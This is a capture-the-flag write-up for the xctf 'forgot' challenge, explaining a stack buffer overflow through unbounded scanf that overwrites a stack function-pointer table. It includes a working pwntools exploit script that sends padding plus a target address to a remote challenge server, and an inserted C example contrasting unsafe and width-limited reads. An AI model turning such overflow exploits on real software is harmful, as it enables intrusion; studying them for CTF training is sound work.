xctf - forgot
checksec: NX is enabled.
Loading the binary in IDA, you find:
__isoc99_scanf reads input with no length limit.
A loop then walks the 32 characters scanf read and, depending on the check on each one, picks an entry from a table of function pointers that lives on the stack directly below the overflowable variable.
v3 + --v14 is used directly as the function address taken from the stack; when v14 is 1 the address called is v3 itself. So a payload of padding plus 63 bytes followed by the destination address gets the flag.
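The layout the write-up describes, as an added example that is not the challenge binary: a fixed-size name buffer with a function pointer stored right past it, the unbounded scanf pattern that lets input run into that pointer, and the width-limited read that keeps it intact. Struct, names and the 63-byte input are constructed for illustration.

```c
#include <stdio.h>
#include <string.h>

#define NAME_LEN 32

/* Constructed frame: overflowable buffer followed by a function pointer,
 * mirroring the stack layout described in the write-up. */
struct frame {
    char name[NAME_LEN];     /* buffer filled from user input */
    void (*handler)(void);   /* pointer sitting just past the buffer */
};

static void say_hello(void) { puts("hello"); }

/* Unsafe pattern from the write-up: "%s" has no width, so input longer
 * than NAME_LEN-1 runs past name[] into handler. Shown for contrast only;
 * not called by this example. */
void read_name_unbounded(struct frame *f, FILE *in) {
    if (fscanf(in, "%s", f->name) != 1)
        f->name[0] = '\0';
}

/* Hardened read: a width-limited conversion stores at most NAME_LEN-1
 * characters plus the terminator, so handler cannot be overwritten. */
int read_name_bounded(struct frame *f, const char *input) {
    char fmt[16];
    snprintf(fmt, sizeof fmt, "%%%ds", NAME_LEN - 1);   /* builds "%31s" */
    return sscanf(input, fmt, f->name) == 1;
}

/* Feeds a constructed 63-byte input (the padding length from the write-up)
 * through the bounded read; returns 1 if handler survived, 0 otherwise. */
int pointer_survives_overflow_attempt(void) {
    struct frame f;
    char input[64];
    memset(input, 'A', 63);
    input[63] = '\0';
    f.handler = say_hello;
    if (!read_name_bounded(&f, input))
        return 0;
    return f.handler == say_hello && strlen(f.name) == NAME_LEN - 1;
}
```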
from pwn import *

context.log_level = 'debug'
p = remote('111.198.29.45', 31543)
#p = process('./forgot')

'''
# Earlier attempt: 63 bytes of padding followed by the target address
payload = b"A"*63 + b"\xcc\x86\x04\x08"
p.recvuntil(b"What is your name?")
p.sendline(payload)
p.interactive()
'''

# 0x24 bytes of padding, then the little-endian target address 0x080486CC
payload = b'A'*0x24 + p32(0x080486CC)
#payload = b"A"*32 + b"\xcc\x86\x04\x08"
p.recvuntil(b"> ")
p.sendline(b'a')        # first prompt: any name
p.recvuntil(b"> ")
p.sendline(payload)     # second prompt: the overflowing input
p.interactive()
PS: For now I don't know why payload = "A"*32+"\xcc\x86\x04\x08" gets the flag, but payload = "a"*32+"\xcc\x86\x04\x08" does not.